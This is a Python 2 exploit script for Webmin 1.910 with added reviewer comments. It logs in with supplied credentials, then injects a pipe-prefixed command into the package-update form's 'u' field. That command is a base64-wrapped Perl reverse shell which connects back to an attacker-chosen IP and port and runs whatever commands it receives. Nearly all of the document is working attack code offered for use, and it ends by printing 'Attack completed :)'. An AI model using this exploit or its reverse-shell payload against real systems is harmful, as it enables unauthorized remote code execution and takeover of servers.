This is a simple exploit for version 1.910 of the Webmin service that leads to remote code execution.
#!/usr/bin/python | |
from requests import post | |
from urllib import quote | |
from base64 import b64encode | |
from requests.packages.urllib3 import disable_warnings | |
from urllib3.exceptions import InsecureRequestWarning | |
# NOTE(review): this is a Python 2 script (print statements, urllib.quote,
# b64encode applied to a str); it does not run unchanged under Python 3.
# Placeholders for the Webmin account that login() posts -- the exploit needs
# valid credentials, it is not an unauthenticated attack.
USER = 'USER'
PASS = 'PASSWORD'
# Target host and port, consumed only by base_url().
RHOST = 'REMOTE_IP'
RPORT = 'REMOTE_PORT'
# Address the perl one-liner below connects back to (its PeerAddr).
LHOST = 'YOUR_IP'
LPORT = 'YOUR_PORT'
# Selects https vs http in base_url(); every request is sent with verify=False,
# so certificate validation is off regardless of this flag.
SSL = True
# Perl one-liner run on the target: forks (the parent exits), re-assigns every
# %ENV value through a /(.*)/ capture (presumably a taint-mode workaround),
# opens a TCP connection to LHOST:LPORT, attaches STDIN and (via $~) STDOUT to
# that socket, and passes each line it receives to system().  The ``{{``/``}}``
# are str.format escapes for literal braces; the trailing ';' is a Python no-op.
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT);
# The same command base64-encoded and wrapped in a bash -c brace-expansion
# form (``{echo,...}|{base64,-d}|{bash,-i}``), so the inner command contains no
# whitespace.  This is the string deliver_payload() places in the ``u`` field.
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"')
def base_url():
    """Return the target's base URL as ``<scheme>://RHOST:RPORT/`` (trailing slash included).

    The scheme is https when the module-level SSL flag is truthy, http otherwise.
    """
    if SSL:
        scheme = 'https'
    else:
        scheme = 'http'
    return '{}://{}:{}/'.format(scheme, RHOST, RPORT)
def login():
    """Authenticate against session_login.cgi and return the issued ``sid`` cookie.

    Posts USER/PASS as form fields together with preset ``testing``/``redirect``/
    ``sid`` cookies (presumably what the login handler expects), with TLS
    verification disabled and without following the redirect.  Raises KeyError
    if the response carries no ``sid`` cookie, i.e. the login did not succeed.
    """
    credentials = {'user': USER, 'pass': PASS}
    bootstrap_cookies = {'testing': '1', 'redirect': '1', 'sid': 'x'}
    reply = post(
        base_url() + 'session_login.cgi',
        data=credentials,
        cookies=bootstrap_cookies,
        verify=False,
        allow_redirects=False,
    )
    return reply.cookies['sid']
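def deliver_payload(sid):
    """POST the package-update form that carries the encoded command.

    sid: the Webmin session id returned by login(); sent as the ``sid`` cookie.
    Returns None.  The HTTP response is deliberately not inspected, so the
    caller cannot tell from this function whether the command actually ran.
    """
    # The ``u`` field (package to update) is sent twice; the second value is
    # "| <command>".  update.cgi evidently hands the package name to a shell,
    # so what follows the pipe executes on the server -- this is the
    # code-execution path the header line refers to.
    data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
    cookies = {'sid': sid}
    # NOTE(review): base_url() already ends with '/', so this Referer contains a
    # double slash; kept as-is rather than guess whether the server cares.
    headers = {
        'content-type': 'application/x-www-form-urlencoded',
        'Referer': '{}/package-updates/?xnavigation=1'.format(base_url()),
    }
    try:
        # The response used to be bound to an unused local; it is discarded.
        post(base_url() + 'package-updates/update.cgi', cookies=cookies,
             headers=headers, data=data, verify=False, allow_redirects=False)
    except KeyboardInterrupt:
        # The request may block while the injected command runs; Ctrl-C here
        # just abandons the wait and lets the caller continue.  Best-effort
        # behaviour of the original, intentionally preserved.
        pass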
def banner():
    """Print the tool's ASCII-art banner and author credit to stdout, one line each."""
    # Raw strings keep the backslashes of the artwork verbatim; the credit line
    # is a normal string because it ends with a real newline escape.
    lines = (
        r" __ __ _ _ __ ___ __ ___ ",
        r" \ \ / / | | (_) /_ | / _ \/_ | / _ \ ",
        r" \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |",
        r" \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |",
        r" \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |",
        r" \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ ",
        " ",
        " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n",
    )
    for line in lines:
        print(line)
if __name__ == '__main__':
    banner()
    print 'Connecting to {}'.format(base_url())
    # Silence urllib3's warning for the verify=False requests that follow.
    disable_warnings(category=InsecureRequestWarning)
    # Authenticated step: a valid Webmin account is required before the
    # command-carrying request can be sent.  Raises KeyError if no sid is issued.
    session_cookie = login()
    # NOTE(review): the sid is issued by the server, not forged; message kept.
    print 'Cookies forged: {}'.format(session_cookie)
    print 'Attacking using this payload: {}'.format(PAYLOAD)
    deliver_payload(session_cookie)
    # Success is not verified anywhere: deliver_payload() discards the response.
    print 'Attack completed :)'